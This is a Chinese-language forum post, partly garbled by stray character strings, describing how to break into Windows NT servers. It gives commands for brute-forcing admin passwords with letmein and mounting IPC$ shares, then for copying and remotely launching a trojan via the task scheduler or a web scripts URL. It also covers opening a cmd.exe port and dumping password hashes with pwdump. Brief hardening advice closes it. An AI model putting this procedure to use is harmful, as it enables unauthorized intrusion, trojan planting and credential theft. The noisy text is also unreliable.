遠程入侵NT ----spp(低音炮)

看了篇文章介紹使用netbus 或 netspy　遠程入侵nt系統(tǒng)，感覺真是。?？磥韓t系統(tǒng)的共享機制如果不配合火墻使用，SMB會給你造成很大麻煩。?！∵B小小 只的木馬都可以讓nt管理員頭大。
    其攻擊過程如下：
# z4 P$ f) K% j) z) X1、使用掃描工具查找NT主機　　　　　　
. J: p" W7 D: S2 、確定攻擊目標后，使用letmein 對目標主機進行攻擊， 如：
letmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊)
letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊)
letmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶)
注：- 確定目標后，收集目標信息并嘗試取得非法資源
+ A" v, R1 R) W4 r2 i3、當letmein 獲取相關(guān)管理員權(quán)限后，使用ms提供的合法命令：
net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程
( d0 X; D  u9 A! H; E. X& dcopy x:\netserver.exe \\x.x.x.x\admin$\system32
7 w! p( R+ j( G) y. D3 I( g  M4、使用合法ms命令遠程啟動木馬服務(wù)：
5 Y. l3 R3 [: Rnetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg

   該方法有其巧妙之處。。利用nt的任務(wù)計劃管理，在特定時候啟動木馬服務(wù)

) I, J/ D; {  L9 s5 K   另一種方法：
1 @# ]1 B, k4 |; M, T0 ~9 V   將ntsrver.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄， 如cgi-bin或scripts，然后在瀏覽器鍵入url如： http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動

, {5 W0 {" }7 M% q9 z" b    到此，該次攻擊可以算成功了，遠程資源已在別人控制下。
! V: k; ~9 t% H    如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口，更方便使用該遠程資源 。比如：使用pwdump 將遠程nt上所有用戶和密碼 dump成文件，回傳本地，使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程，不難看出，關(guān)鍵步驟是letmein取得admin權(quán)限，但是很不幸，就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言，密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務(wù)器進行掃描的結(jié)果，除了solaris和linux系統(tǒng)之外，其余的nt被letmein猜中率有75%以上。而且在這些被進入的機器上，SMB都有在tcp/ip上 跑，有兩臺有配備火墻，但是沒有封閉對外137-139口。
9 U/ J3 u, |- |8 M/ d( o6 ~
     對策：
1 }2 Z, r  [% Q: u' t１、還是老話，密碼的選擇問題，使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉。
% \: A8 e- X1 }" G$ j２、nt網(wǎng)絡(luò)的適當配置，不要在對外的nc綁定共享服務(wù)是個好習慣，特別是tcp/ip協(xié)議。
; {; D7 Z- A/ M2 |３、防火墻的配置，屏蔽一切不需要的服務(wù)端口，象netebui在tcp/ip上的137-139口，開這些口只會使你的系統(tǒng)處于危險的處境，如果非要在遠程使用這些口的服務(wù)，建議使用其他軟件來代替。
0 V( w  F0 S. L2 N' A+ Q４、及時檢查日記和監(jiān)控服務(wù)的運行，定時對文件系統(tǒng)的權(quán)限受托關(guān)系進行檢查。
５、管理人員素質(zhì)的提高，安全風險意思加強無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 。